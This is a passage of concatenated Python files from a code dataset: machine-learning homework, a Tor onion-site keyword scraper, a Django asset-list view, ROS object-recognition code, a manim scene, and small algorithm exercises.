matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nimport time\n\nLEARNING_RATE = 0.1\n\ndef main():\n if len(sys.argv) < 9:\n print(\"Please give formatted_train_out, formatted_validation_out, formatted_test_out, dict_input, \"\n \"train_out_labels, test_out_labels, metrics_out, and epochs respectively in commandline arguments.\")\n\n # start = time.time()\n formatted_train_out = sys.argv[1]\n formatted_validation_out = sys.argv[2]\n formatted_test_out = 
sys.argv[3]\n dict_input = sys.argv[4]\n train_out_labels = sys.argv[5]\n test_out_labels = sys.argv[6]\n metrics_out = sys.argv[7]\n epochs = int(sys.argv[8])\n\n with open(dict_input, 'r') as f:\n dict_input = f.readlines()\n word_dict = {}\n for line in dict_input:\n key, value = line.split()\n word_dict[key.strip()] = int(value)\n with open(formatted_train_out, 'r') as f:\n train_data = f.readlines()\n # with open(formatted_validation_out, 'r') as f:\n # validation_data = f.readlines()\n with open(formatted_test_out, 'r') as f:\n test_data = f.readlines()\n\n theta = np.zeros(len(word_dict)+1)\n X_train, Y_train = get_data(train_data)\n # X_validation, Y_validation = get_data(validation_data)\n X_test, Y_test = get_data(test_data)\n theta = train_logistic_regression(X_train, Y_train, theta, epochs)\n # theta, train_loss, validation_loss = train_logistic_regression_valid(X_train, Y_train, X_validation, Y_validation, theta, epochs)\n Y_train_predicted = predict(X_train, theta)\n Y_test_predicted = predict(X_test, theta)\n train_error = calculate_error(Y_train_predicted, Y_train)\n test_error = calculate_error(Y_test_predicted, Y_test)\n\n with open(train_out_labels, 'w') as f:\n for i in range(len(Y_train_predicted)):\n f.write(str(Y_train_predicted[i]))\n f.write('\\n')\n with open(test_out_labels, 'w') as f:\n for i in range(len(Y_test_predicted)):\n f.write(str(Y_test_predicted[i]))\n f.write('\\n')\n with open(metrics_out, 'w') as f:\n f.write(\"error(train): {}\\n\".format(str.format('{0:.6f}', train_error)))\n f.write(\"error(test): {}\\n\".format(str.format('{0:.6f}', test_error)))\n # end = time.time()\n # print(end-start)\n\n # print(train_loss)\n # print(validation_loss)\n # plt.plot(range(len(train_loss[:200])), train_loss[:200], label=\"Train Loss\")\n # plt.plot(range(len(validation_loss[:200])), validation_loss[:200], label=\"Validation Loss\")\n # plt.xlabel(\"Number of Epochs\")\n # plt.ylabel(\"Average Negative Log Likelihood\")\n # plt.legend()\n # plt.show()\n\ndef calculate_error(Y_predicted, Y):\n count = 0.0\n for i in range(len(Y)):\n if Y_predicted[i] != Y[i]:\n count += 1\n return count/float(len(Y))\n\ndef train_logistic_regression(X_train, Y_train, theta, epochs):\n for i in range(epochs):\n for j in range(len(X_train)):\n theta = update_theta_step_sgd(theta, X_train, Y_train, j)\n # train_loss = calculate_loss_function(theta, X_train, Y_train)\n # print(\"Train loss after epoch {}: {}\\n\".format(i, train_loss))\n return theta\n\ndef train_logistic_regression_valid(X_train, Y_train, X_validation, Y_validation, theta, epochs):\n train_loss, validation_loss = [], []\n for i in range(epochs):\n for j in range(len(X_train)):\n theta = update_theta_step_sgd(theta, X_train, Y_train, j)\n train_loss.append(calculate_loss_function(theta, X_train, Y_train))\n validation_loss.append(calculate_loss_function(theta, X_validation, Y_validation))\n return theta, train_loss, validation_loss\n\ndef predict(X, theta):\n Y = []\n for i in range(len(X)):\n theta_x = calculate_dot_product(theta, X[i])\n exponent = math.exp(theta_x)\n if (exponent/(1.0 + exponent)) > 0.5:\n Y.append(1)\n else:\n Y.append(0)\n return Y\n\ndef get_data(data_lines):\n X, Y = [], []\n for data_line in data_lines:\n line_data = data_line.split('\\t')\n y = int(line_data[0])\n Y.append(y)\n x = {0: 1}\n parameters = line_data[1:]\n for parameter in parameters:\n vals = parameter.split(':')\n x[int(vals[0])+1] = int(vals[1])\n X.append(x)\n return X, Y\n\ndef update_theta_step_sgd(theta, X, Y, i):\n 
theta_x = calculate_dot_product(theta, X[i])\n gradient = np.zeros(len(theta))\n for key in X[i].keys():\n term1 = -1 * (X[i])[key]\n exponent = math.exp(theta_x)\n term2 = Y[i] - (exponent/(1.0 + exponent))\n gradient[key] = term1 * term2\n theta = theta - LEARNING_RATE * gradient\n return theta\n\ndef calculate_loss_function(theta, X, Y):\n sum = 0.0\n for i in range(len(X)):\n theta_x = calculate_dot_product(theta, X[i])\n term1 = -1 * Y[i] * theta_x\n term2 = math.log(1.0 + math.exp(theta_x))\n sum += (term1 + term2)\n return sum/len(X)\n\ndef calculate_dot_product(theta, x):\n sum = 0.0\n for key in x.keys():\n sum += theta[key] * x[key]\n return sum\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"HW4/handout/pr.py","file_name":"pr.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"639068527","text":"import socks\nimport socket\nimport requests\nimport re\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\n\n\n# libraries to scarp the data\nfrom bs4 import BeautifulSoup\nfrom bs4.element import Comment\nfrom urllib.request import urlopen\n\n\n# connect socks \nsocks.set_default_proxy(socks.SOCKS5, \"localhost\", 9150)\nsocket.socket = socks.socksocket\n# yake module to extract Keywords\nimport yake\nkw_extractor = yake.KeywordExtractor()\nlanguage = \"en\"\nmax_ngram_size = 2\ndeduplication_thresold = 0.9\ndeduplication_algo = 'seqm'\nwindowSize = 1\n# get the top 20 keywords\nnumOfKeywords = 20\n\n\n# for socket connection\ndef getaddrinfo(*args):\n return [(socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))]\nsocket.getaddrinfo = getaddrinfo\n\n\n# to find the visible Tags\ndef tag_visible(element):\n if element.parent.name in ['style', 'script', 'head', 'title', 'meta', '[document]','script','a']:\n return False\n if isinstance(element, Comment):\n return False\n return True\n\n\n# code to get text from HTML\ndef text_from_html(body):\n soup = BeautifulSoup(body, 'html.parser')\n texts = soup.findAll(text=True)\n visible_texts = filter(tag_visible, texts) \n return u\" \".join(t.strip() for t in visible_texts)\n\n\n# read the link & get the HTML\nhtml = urlopen('http://jncyepk6zbnosf4p.onion/onions.html').read()\n# parse the HTML\nsoup = BeautifulSoup(html, \"html.parser\")\n# Get the PRE tags\npre_tags = soup.findAll('pre',text=True)\n\n\n# below code is to extract the urls from the link\nonions = []\nfor i, pre_tag in enumerate(pre_tags): \n\ttry:\n\t\tif i!=0:\n\t\t\ttext = (pre_tag.text)\n\t\t\tonion_unfiltered = (text.split(\"\\u2003\\u2003\\u2003\\u2003\"))\n\t\t\tif onion_unfiltered[1].endswith('onion') and onion_unfiltered[3] == '200':\n\t\t\t\tonions.append(onion_unfiltered[1])\n\texcept Exception as E:\n\t\tpass\n\n\noutput = {}\ncustom_kw_extractor = yake.KeywordExtractor(lan=language, n=max_ngram_size, dedupLim=deduplication_thresold, dedupFunc=deduplication_algo, windowsSize=windowSize, top=numOfKeywords, features=None)\n\n# function to extract key words from the onion link\ndef tag(onion):\n\ttry:\n\t\t# extract the HTML\n\t\thtml = urlopen('http://'+onion).read()\n\t\t# get the text from the HTML\n\t\ttext = text_from_html(html)\n\t\t# extract keywords from the text\n\t\tkeywords = custom_kw_extractor.extract_keywords(text)\n\t\t# add keywords to the output\n\t\tfor kw in keywords:\n\t\t\tif onion not in output:\n\t\t\t\toutput[onion] = [kw[0]]\n\t\t\telse: \n\t\t\t\toutput[onion].append(kw[0])\n\texcept Exception as E:\n\t\tpass\n\n\n# 
making concurrency\nprocesses = []\n# assigning 5 workers\nwith ThreadPoolExecutor(max_workers=5) as executor:\n\t# creating threads for the first 5 onions\n\tfor onion in onions[:5]:\n \tprocesses.append(executor.submit(tag, onion))\n\n\nfor task in as_completed(processes):\n\ttask.result()\n\n\n# prints the url & its resp. keywords\nprint(output)\n","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"279383060","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# author:owefsad\n# software: PyCharm\n# project: lingzhi-webapi\n\nfrom dongtai.endpoint import R, UserEndPoint\nfrom dongtai.models.asset import Asset\n\nfrom iast.base.agent import get_agents_with_project\nfrom iast.base.project_version import get_project_version, get_project_version_by_id\nfrom iast.serializers.sca import ScaSerializer\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass ScaList(UserEndPoint):\n def get(self, request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n auth_users = self.get_auth_users(request.user)\n auth_agents = self.get_auth_agents(auth_users)\n\n language = request.query_params.get('language')\n if language:\n auth_agents = auth_agents.filter(language=language)\n\n queryset = Asset.objects.filter(agent__in=auth_agents)\n\n order = request.query_params.get('order', None)\n order_fields = [\n 'level', 'package_name', 'vul_count', 'version', 'language', 'dt',\n 'project_name'\n ]\n order = order if order in order_fields + list(\n map(lambda x: ''.join(['-', x]), order_fields)) else None\n\n package_kw = request.query_params.get('keyword', None)\n\n project_id = request.query_params.get('project_id', None)\n if project_id and project_id != '':\n\n version_id = request.GET.get('version_id', None)\n if not version_id:\n current_project_version = get_project_version(\n project_id, auth_users)\n else:\n current_project_version = get_project_version_by_id(version_id)\n agents = self.get_auth_agents(auth_users).filter(\n bind_project_id=project_id,\n project_version_id=current_project_version.get(\"version_id\", 0)\n )\n queryset = queryset.filter(agent__in=agents)\n project_name = request.query_params.get('project_name')\n if project_name and project_name != '':\n agent_ids = get_agents_with_project(project_name, auth_users)\n if agent_ids:\n queryset = queryset.filter(agent_id__in=agent_ids)\n\n level = request.query_params.get('level')\n if level:\n queryset = queryset.filter(level=level)\n\n if package_kw and package_kw.strip() != '':\n queryset = queryset.filter(package_name__icontains=package_kw)\n\n if order:\n queryset = queryset.order_by(order)\n else:\n queryset = queryset.order_by('-dt')\n page = request.query_params.get('page', 1)\n page_size = request.query_params.get('pageSize', 20)\n page_summary, page_data = self.get_paginator(queryset, page, page_size)\n return R.success(data=ScaSerializer(page_data, many=True).data, page=page_summary)\n","sub_path":"iast/views/scas.py","file_name":"scas.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"5883558","text":"from PIL import Image\nfrom tempfile import NamedTemporaryFile\nfrom io import BytesIO\nimport requests\n\ndef apply_harper_collins_logo(url):\n response = requests.get(url)\n background = Image.open(BytesIO(response.content))\n foreground = 
Image.open('images/harper_collins_logo.png')\n foreground.thumbnail((background.width // 4, background.width // 4), Image.ANTIALIAS)\n y_coord = background.height - foreground.height\n background.paste(foreground, (0, y_coord), foreground.convert('RGBA'))\n\n temp_file=NamedTemporaryFile()\n background.save(temp_file, format='png')\n return temp_file\n","sub_path":"process_image.py","file_name":"process_image.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"84992107","text":"import sys\nfrom manim_imports_ext import *\n\nclass MeasureScene(AlgoScene):\n def construct(self):\n shape = self.camera.frame.get_shape()\n\n t = Text(\"1 width %.2f height %.2f delta 0.00\"%(shape[0], shape[1]), color=GREEN, font_size=20).shift(LEFT*3).scale(1)\n self.add(t)\n horizon = Line(start=LEFT*shape[0]/2, end=RIGHT*shape[0]/2, color=RED)\n verticle = Line(start=UP*shape[1]/2, end=DOWN*shape[1]/2, color=BLUE)\n\n t.next_to(horizon, direction=UP, buff=0)\n\n count = 2\n delta = 0.0\n while True:\n nt = Text(\"%d width %.2f height %.2f delta %.2f\"%(count, shape[0], shape[1], delta), \n color=GREEN, font_size=20).shift(LEFT*3).scale(1)\n nt.next_to(t, direction=UP, buff=0)\n p = nt.get_center()\n delta = p[1] - t.get_center()[1]\n t = nt\n if p[1] > shape[1]/2:\n break\n count += 1\n self.add(nt)\n\n # self.camera.frame.shift(OUT*0.2)\n self.play(ShowCreation(horizon), ShowCreation(verticle))\n self.snapshot()\n self.wait()\n","sub_path":"animations/measure_scene.py","file_name":"measure_scene.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"252887403","text":"import logging\nfrom flask import request, jsonify\nfrom codeitsuisse import app\n\nlogger = logging.getLogger(__name__)\n\n@app.route('/inventory-management', methods=['POST'])\ndef evaluateInventoryManagement():\n data = request.get_json()\n logging.info('data sent for evaluation: {}'.format(data))\n result = []\n for test in data:\n target = test['searchItemName']\n items = test['items']\n ans = solve(target, items)\n result.append({'searchItemName': target, 'searchResult': ans})\n logging.info('my result: {}'.format(result))\n return jsonify(result)\n\ndef solve(target, items):\n ans = {}\n str_ans = {}\n for item in items:\n l1 = len(target)\n l2 = len(item)\n l = max(l1, l2) + 1\n \n # init\n table = [[0 for j in range(l)] for i in range(l)]\n for i in range(1, l1 + 1):\n table[i][0] = i * 1\n for j in range(1, l2 + 1):\n table[0][j] = j * 1\n str_table = [['' for j in range(l)] for i in range(l)]\n for i in range(1, l1 + 1):\n str_table[i][0] = str_table[i - 1][0] + '-' + target[i - 1]\n for j in range(1, l2 + 1):\n str_table[0][j] = str_table[j - 1][0] + '+' + item[j - 1]\n\n # dp\n for i in range(1, l1 + 1):\n for j in range(1, l2 + 1):\n # replace\n if target[i - 1].lower() == item[j - 1].lower():\n table[i][j] = table[i - 1][j - 1]\n str_table[i][j] = str_table[i - 1][j - 1] + target[i - 1]\n else:\n table[i][j] = table[i - 1][j - 1] + 1\n str_table[i][j] = str_table[i - 1][j - 1] + item[j - 1]\n # delete\n temp_del = table[i - 1][j] + 1\n if temp_del < table[i][j]:\n table[i][j] = temp_del\n str_table[i][j] = str_table[i - 1][j] + '-' + target[i - 1]\n # insert\n temp_ins = table[i][j - 1] + 1\n if temp_ins < table[i][j]:\n table[i][j] = temp_ins\n str_table[i][j] = str_table[i][j - 1] + '+' + item[j - 1]\n \n ans[item] = table[l1][l2]\n 
str_ans[item] = str_table[l1][l2]\n\n sorted_ans = sorted(ans.items(), key=lambda x: (x[1], x[0]))\n\n res = []\n for i in sorted_ans:\n print(i[0], i[1])\n res.append(str_ans[i[0]])\n\n if len(res) > 10:\n res = res[:10]\n\n return res\n","sub_path":"codeitsuisse/routes/inventory_management.py","file_name":"inventory_management.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"384860578","text":"#!/usr/bin/env python\n\n# Import modules\nimport numpy as np\nimport sklearn\nfrom sklearn.preprocessing import LabelEncoder\nimport pickle\nfrom sensor_stick.srv import GetNormals\nfrom sensor_stick.features import compute_color_histograms\nfrom sensor_stick.features import compute_normal_histograms\nfrom visualization_msgs.msg import Marker\nfrom sensor_stick.marker_tools import *\nfrom sensor_stick.msg import DetectedObjectsArray\nfrom sensor_stick.msg import DetectedObject\nfrom sensor_stick.pcl_helper import *\n\nimport rospy\nimport tf\nfrom geometry_msgs.msg import Pose, Point, Quaternion\nfrom std_msgs.msg import Float64\nfrom std_msgs.msg import Int32\nfrom std_msgs.msg import String\nfrom pr2_robot.srv import *\nfrom rospy_message_converter import message_converter\nimport yaml\nimport os\n\n# Helper function to get surface normals\ndef get_normals(cloud):\n get_normals_prox = rospy.ServiceProxy('/feature_extractor/get_normals', GetNormals)\n return get_normals_prox(cloud).cluster\n\n# Helper function to create a yaml friendly dictionary from ROS messages\ndef make_yaml_dict(test_scene_num, arm_name, object_name, pick_pose, place_pose):\n yaml_dict = {}\n yaml_dict[\"test_scene_num\"] = test_scene_num.data\n yaml_dict[\"arm_name\"] = arm_name.data\n yaml_dict[\"object_name\"] = object_name.data\n yaml_dict[\"pick_pose\"] = message_converter.convert_ros_message_to_dictionary(pick_pose)\n yaml_dict[\"place_pose\"] = message_converter.convert_ros_message_to_dictionary(place_pose)\n return yaml_dict\n\n# Helper function to output to yaml file\ndef send_to_yaml(yaml_filename, dict_list):\n data_dict = {\"object_list\": dict_list}\n with open(yaml_filename, 'w') as outfile:\n yaml.dump(data_dict, outfile, default_flow_style=False)\n\n# Define functions as required\ndef vox_filt( cloud, LEAF_SIZE = 0.005 ):\n vox = cloud.make_voxel_grid_filter()\n vox.set_leaf_size(LEAF_SIZE, LEAF_SIZE, LEAF_SIZE)\n return vox.filter()\n\ndef passthrough_filt( cloud, filter_axis = 'z', axis_min = 0.6, axis_max = 1.1 ):\n passthrough = cloud.make_passthrough_filter()\n passthrough.set_filter_field_name(filter_axis)\n passthrough.set_filter_limits(axis_min, axis_max)\n return passthrough.filter()\n\ndef outlier_filt( cloud, mean_k = 10, dev_mul = 0.01 ):\n out = cloud.make_statistical_outlier_filter()\n out.set_mean_k( mean_k )\n out.set_std_dev_mul_thresh( dev_mul)\n return out.filter()\n\ndef seg_plane( cloud, max_distance = 0.01 ):\n seg = cloud.make_segmenter()\n seg.set_model_type(pcl.SACMODEL_PLANE)\n seg.set_method_type(pcl.SAC_RANSAC)\n seg.set_distance_threshold(max_distance)\n inliers, coefficients = seg.segment()\n return inliers, coefficients\n\ndef euclidean_cluster( white_cloud, tolerance = 0.05, min = 100, max = 2500 ):\n tree = white_cloud.make_kdtree()\n # Create a cluster extraction object\n ec = white_cloud.make_EuclideanClusterExtraction()\n # Set tolerances for distance threshold\n # as well as minimum and maximum cluster size (in points)\n ec.set_ClusterTolerance( tolerance )\n 
ec.set_MinClusterSize( min )\n ec.set_MaxClusterSize( max )\n # Search the k-d tree for clusters\n ec.set_SearchMethod( tree )\n # Extract indices for each of the discovered clusters\n return ec.Extract()\n\n# Callback function for your Point Cloud Subscriber\ndef pcl_callback(pcl_msg):\n\n # Convert ROS msg to PCL data\n cloud = ros_to_pcl( pcl_msg )\n\n # Outliers removing\n cloud = outlier_filt( cloud )\n\n # Voxel Grid Downsampling\n cloud = vox_filt( cloud )\n\n # PassThrough Filter\n cloud = passthrough_filt( cloud )\n cloud = passthrough_filt( cloud, filter_axis = 'y', axis_min = - 0.45, axis_max = 0.45 )\n\n # RANSAC Plane Segmentation\n inliers, coefficients = seg_plane( cloud )\n\n # Extract inliers and outliers\n cloud_table = cloud.extract( inliers, negative = False )\n cloud_objects = cloud.extract( inliers, negative = True )\n\n # Euclidean Clustering\n white_cloud = XYZRGB_to_XYZ( cloud_objects )\n cluster_indices = euclidean_cluster( white_cloud )\n\n # Create Cluster-Mask Point Cloud to visualize each cluster separately\n #Assign a color corresponding to each segmented object in scene\n cluster_color = get_color_list( len( cluster_indices ) )\n\n color_cluster_point_list = []\n\n for j, indices in enumerate( cluster_indices ):\n for i, indice in enumerate(indices):\n color_cluster_point_list.append( [ white_cloud[ indice ][ 0 ],\n white_cloud[ indice ][ 1 ],\n white_cloud[ indice ][ 2 ],\n rgb_to_float( cluster_color[ j ] ) ] )\n\n #Create new cloud containing all clusters, each with unique color\n cluster_cloud = pcl.PointCloud_PointXYZRGB()\n cluster_cloud.from_list( color_cluster_point_list )\n\n ros_cluster_cloud = pcl_to_ros( cluster_cloud )\n\n # Convert PCL data to ROS messages\n ros_cloud_table = pcl_to_ros( cloud_table )\n ros_cloud_objects = pcl_to_ros( cloud_objects )\n\n # Publish ROS messages\n pcl_table_pub.publish( ros_cloud_table )\n pcl_objects_pub.publish( ros_cloud_objects )\n\n pcl_cluster_pub.publish( ros_cluster_cloud )\n\n # Exercise-3 TODOs:\n\n # Classify the clusters! 
(loop through each detected cluster one at a time)\n detected_objects = []\n detected_objects_labels = []\n\n for idx, pts_list in enumerate( cluster_indices ):\n # Grab the points for the cluster\n pcl_cluster = cloud_objects.extract( pts_list )\n ros_cluster = pcl_to_ros( pcl_cluster )\n\n # Compute the associated feature vector\n chists = compute_color_histograms( ros_cluster, using_hsv = True )\n # normals = get_normals( ros_cluster )\n # nhists = compute_normal_histograms( normals )\n feature = chists # np.concatenate( ( chists, nhists ) )\n\n # Make the prediction\n prediction = clf.predict( scaler.transform( feature.reshape( 1, -1 ) ) )\n label = encoder.inverse_transform( prediction )[ 0 ]\n detected_objects_labels.append( label )\n\n # Publish a label into RViz\n label_pos = list( white_cloud[ pts_list[ 0 ] ] )\n label_pos[ 2 ] += .4\n object_markers_pub.publish( make_label( label, label_pos, idx ) )\n\n # Add the detected object to the list of detected objects.\n do = DetectedObject()\n do.label = label\n do.cloud = ros_cluster\n detected_objects.append( do )\n\n rospy.loginfo( 'Detected {} objects: {}'.format( len( detected_objects_labels ), detected_objects_labels ) )\n\n # Publish the list of detected objects\n detected_objects_pub.publish( detected_objects )\n\n # output yaml\n output_file = 'output_1.yaml'\n\n if not os.path.exists( output_file ):\n object_list_param = rospy.get_param( '/object_list' )\n dropbox_param = rospy.get_param( '/dropbox' )\n\n if dropbox_param[ 0 ][ 'group' ] == 'red':\n dropbox = {\n 'red': dropbox_param[ 0 ],\n 'green': dropbox_param[ 1 ]\n }\n else:\n dropbox = {\n 'red': dropbox_param[ 1 ],\n 'green': dropbox_param[ 0 ]\n }\n\n dicts = []\n for obj in object_list_param:\n name = obj[ 'name' ]\n group = obj[ 'group' ]\n box = dropbox[ group ]\n\n for do in detected_objects:\n if do.label == name:\n ps = ros_to_pcl( do.cloud ).to_array()\n cs = np.mean( ps, axis = 0 )[ : 3 ]\n\n dict = make_yaml_dict( * pick_req( 1, box[ 'name' ], name, cs, box[ 'position' ] ) )\n dicts.append( dict )\n\n send_to_yaml( output_file, dicts )\n\ndef pick_req( test_scene_num, arm_name, object_name, pick_pose, place_pose ):\n msg_scene = Int32()\n msg_scene.data = test_scene_num\n\n msg_arm_name = String()\n msg_arm_name.data = arm_name\n\n msg_obj_name = String()\n msg_obj_name.data = object_name\n\n msg_pick_pose = Pose()\n msg_pick_pose.position = Point()\n msg_pick_pose.position.x = np.asscalar( pick_pose[ 0 ] )\n msg_pick_pose.position.y = np.asscalar( pick_pose[ 1 ] )\n msg_pick_pose.position.z = np.asscalar( pick_pose[ 2 ] )\n\n msg_place_pose = Pose()\n msg_place_pose.position = Point()\n msg_place_pose.position.x = place_pose[ 0 ]\n msg_place_pose.position.y = place_pose[ 1 ]\n msg_place_pose.position.z = place_pose[ 2 ]\n\n return msg_scene, msg_arm_name, msg_obj_name, msg_pick_pose, msg_place_pose\n\nif __name__ == '__main__':\n\n # TODO: ROS node initialization\n rospy.init_node( 'pick_place', anonymous = True )\n\n # TODO: Create Subscribers\n pcl_sub = rospy.Subscriber( \"/pr2/world/points\", PointCloud2, pcl_callback, queue_size = 1 )\n\n # TODO: Create Publishers\n pcl_table_pub = rospy.Publisher( \"/pcl_table\", PointCloud2, queue_size = 1 )\n pcl_objects_pub = rospy.Publisher( \"/pcl_objects\", PointCloud2, queue_size = 1 )\n\n pcl_cluster_pub = rospy.Publisher( \"/pcl_cluster\", PointCloud2, queue_size = 1 )\n\n object_markers_pub = rospy.Publisher( '/object_markers', Marker, queue_size = 1 )\n detected_objects_pub = rospy.Publisher( 
'/detected_objects', DetectedObjectsArray, queue_size = 1 )\n\n # TODO: Load Model From disk\n model = pickle.load( open( 'model.sav', 'rb' ) )\n clf = model[ 'classifier' ]\n encoder = LabelEncoder()\n encoder.classes_ = model[ 'classes' ]\n scaler = model[ 'scaler' ]\n\n # Initialize color_list\n get_color_list.color_list = []\n\n # TODO: Spin while node is not shutdown\n while not rospy.is_shutdown():\n rospy.spin()\n","sub_path":"pr2_robot/scripts/pick_place.py","file_name":"pick_place.py","file_ext":"py","file_size_in_byte":9729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"149413028","text":"\"\"\"\r\n============================\r\nAuthor:柠檬班-木森\r\nTime:2020/5/11 14:29\r\nE-mail:3247119728@qq.com\r\nCompany:湖南零檬信息技术有限公司\r\n============================\r\n\"\"\"\r\n\r\n\r\n# 第一题\r\ndef work1():\r\n li = [11, 21, 4, 55, 6, 67, 123, 54, 66, 9, 90, 56, 34, 22]\r\n li1 = filter(lambda x: x > 5, li)\r\n return [i % 2 for i in li1]\r\n\r\n\r\n# 第二题\r\ndef work2():\r\n name = yield\r\n for i in range(5):\r\n if not isinstance(name, str):\r\n name = '127.0.0.1:8000'\r\n name = yield \"http://\" + name + \"/user/login\"\r\n\r\n\r\n# gen = work2()\r\n# next(gen)\r\n# res = gen.send('www.baidu.com')\r\n# print(res)\r\n# res = gen.send('www.qq.com')\r\n# print(res)\r\n\"\"\"\r\n# 有一个正整数列表(数据是无序的,并且允许有相等的整数存在),\r\n# 编写能实现下列功能的函数,传入列表和正整数x,返回下面要求的三个数据\r\n# def func(array, x)\r\n# '''逻辑代码'''\r\n# return count, li, new_array\r\n# 1、统计并返回在列表中,比正整数x大的数有几个(相同的数只计算一次),并返回-----返回值中的的count\r\n# 2、计算列表中比正整数X小的所有偶数,并返回 -----------返回值中的li\r\n# 3、将列表中比正整数X小的偶数去掉,未去掉的数添加到新列表中,并返回-------返回值中的new_array\r\n\"\"\"\r\n\r\n\r\ndef work3_1(array, x):\r\n \"\"\"用推导式\"\"\"\r\n # 比x大的个数\r\n res1 = len({i for i in array if i > x})\r\n # 正整数X小的所有偶数:放在li1中\r\n li1 = list(filter(lambda i: i < x and i % 2 == 0, array))\r\n # 去除比X小的偶数\r\n [array.remove(i) for i in li1]\r\n new_list = array.copy()\r\n return res1, li1, new_list\r\n\r\n\r\n\"\"\"\r\n4、定义一个函数实现以下功能,第一个元素是数据标识,第二个元素的数值必须大于等于50才返回,\r\n不够50往后累加加到最后如果不够50也直接返回,因为没有可加的数据了\r\n例子1 :\r\na = [[1,3],[2,51],[3,49],[4,42],[5,42]] #入参 \r\na1 = [[2,54],[4,91],[5,42]] #返回 \r\n例子2:\r\nb = [[1,50],[2,5],[3,10],[4,42],[5,42],[6,10]] #入参\r\nb1 = [[1,50],[4,57],[6,52]] #返回\r\n\"\"\"\r\n\r\n\r\n# 第四题:\r\ndef work4(array):\r\n li = []\r\n sum = 0\r\n for i in array:\r\n sum += i[1]\r\n # 第一种元素值大于等50\r\n if sum >= 50 or len(array) == i[0]:\r\n i[1] = sum\r\n li.append(i)\r\n sum = 0\r\n return li\r\n\r\n\r\na = [[1, 3], [2, 51], [3, 49], [4, 42], [5, 42]]\r\nb = [[1, 50], [2, 5], [3, 10], [4, 42], [5, 42], [6, 10]]\r\n\r\nprint(work4(b))\r\n","sub_path":"python基础高阶编程/py_03day/task_02day.py","file_name":"task_02day.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"565147770","text":"\n# -- ------------------------------------------------------------------------------------ -- #\n# -- proyecto: IDI-II\n# -- codigo: IDI_II_Tarea4_JFME.py\n# -- repositorio: https://github.com/IFFranciscoME/IDI_II_GIT\n# -- ------------------------------------------------------------------------------------ -- #\n\nimport sympy as sp\nfrom sympy import symbols, N\nfrom sympy.plotting import plot3d, plot\n\n\n# -- ---------------------------------------- FUNCION: Gradiente Descendente (Ascendente) -- #\n# -- ------------------------------------------------------------------------------------ -- #\n# -- --\n\ndef f_grad(param_fun, param_x, param_y, 
param_e, param_p):\n \"\"\"\n Parameters\n ----------\n param_fun : str : funcion a utilizar\n param_x : numeric : valor inicial para x0\n param_y : numeric : valor inicial para y0\n param_e : numeric : exactitud deseada\n param_p : int : cantidad de digitos para la precision\n\n Returns\n -------\n p_x0 : numeric : componente en x del punto minimo (maximo) encontrado\n p_y0 : numeric : componente en y del punto minimo (maximo) encontrado\n\n Debugging\n ---------\n param_fun = 'x**2 - 24*y + y**2 -10*y'\n param_x = -2\n param_y = 0\n param_e = 10e-3\n param_p = 4\n \"\"\"\n\n # Establecer que es una expresion con variable simbolica\n param_fun = sp.S(param_fun)\n # diferencial de la funcion respecto a x\n f_x = param_fun.diff(x)\n # diferencial de la funcion respecto a y\n f_y = param_fun.diff(y)\n # factor de \"incremento\"\n theta = .1\n # iteraciones\n iteraciones = 0\n\n while True:\n # evaluacion de expresion de gradiente descendente\n\n temp_x = theta*N(f_x.subs(x, param_x).subs(y, param_y)).evalf()\n temp_y = theta*N(f_y.subs(x, param_x).subs(y, param_y)).evalf()\n\n # actualizar contador de iteraciones\n iteraciones += 1\n print(iteraciones)\n\n if abs(temp_x - param_x) < param_e and abs(temp_y - param_y) < param_e:\n break\n\n if iteraciones > 100:\n print(\"Algo paso que son muchas iteraciones sin llegar al resultado\")\n break\n\n param_x = temp_x\n param_y = temp_y\n\n print(\"f(x,y) = \" + str(param_fun) + \"converge\")\n print(\"el número de interaciones fueron: \", iteraciones, sep=\" \")\n print('el error es: ' + str(abs(temp_x - param_x)))\n\n\n# Declarar x, y, z como variables simbolicas\nx, y, z = symbols('x y z')\n\n# Funcion 1\nf_1 = 'x**4 - 3*x**3 + 2'\n# Establecer que es una expresion con variable simbolica\nf_n = sp.S(f_1)\n# Graficar la funcion para explorar dominio\nplot(f_1, (x, -2, +4))\n# Evaluar funcion de gradiente descendente\nf_grad(param_fun=0, param_x=0, param_y=0, param_e=0, param_p=0)\n\n# -- Notas de ejercicio 1\n# grafique de -10 a 10\n# la funcion crece indefinidamente en ambos sentidos, hacia x++ y x--\n# grafique, puse x0=-2, con theta = 0.5, resultado fue que mando a x=32\n\n# Funcion 2\nf_2 = 'x**2 - 24*y + y**2 -10*y'\n# Establecer que es una expresion con variable simbolica\nf_2 = sp.S(f_2)\n# Graficar la funcion para explorar dominio\nplot3d(f_2, (x, -4, +4), (y, -4, +4))\n# Evaluar funcion de gradiente descendente\nf_grad(param_fun=f_2, param_x=1, param_y=-3, param_e=10e-3, param_p=4)\n\n# -- Notas de ejercicio 2\n# grafique de x=-10 a x=10, y=-10 a y=10 y note que la funcion es bastante \"simple\"\n# reduje a -4 todos los valores\n# deje a x=1 y y =-3 y fue bastante rapida la convergencia\n\n# Funcion 3\nf_3 = 'sin((1/2)*x**2 - 